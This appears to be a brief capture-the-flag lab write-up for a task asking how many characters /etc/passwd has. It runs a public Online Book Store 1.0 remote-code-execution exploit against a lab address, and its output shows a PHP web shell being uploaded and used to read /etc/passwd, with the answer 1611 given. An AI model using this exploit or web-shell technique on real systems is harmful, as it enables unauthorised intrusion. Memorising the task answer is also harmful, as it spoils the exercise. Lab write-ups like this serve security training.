Task 29
How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)
Section titled “How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) ”Look for CSE bookstore exploit on google and found the: Online Book Store 1.0 - Unauthenticated Remote Code Execution on this link
- Download and verify the contents of the scipt
- Run the script
- python 47887.py http://10.10.232.250
> Attempting to upload PHP web shell...> Verifying shell upload...> Web shell uploaded to http://10.10.232.250/bootstrap/img/G0d3qErVCM.php> Example command usage: http://10.10.232.250/bootstrap/img/G0d3qErVCM.php?cmd=whoami> Do you wish to launch a shell here? (y/n): yRCE $ wc -c /etc/passwd1611 /etc/passwdAnswer
Section titled “Answer ”1611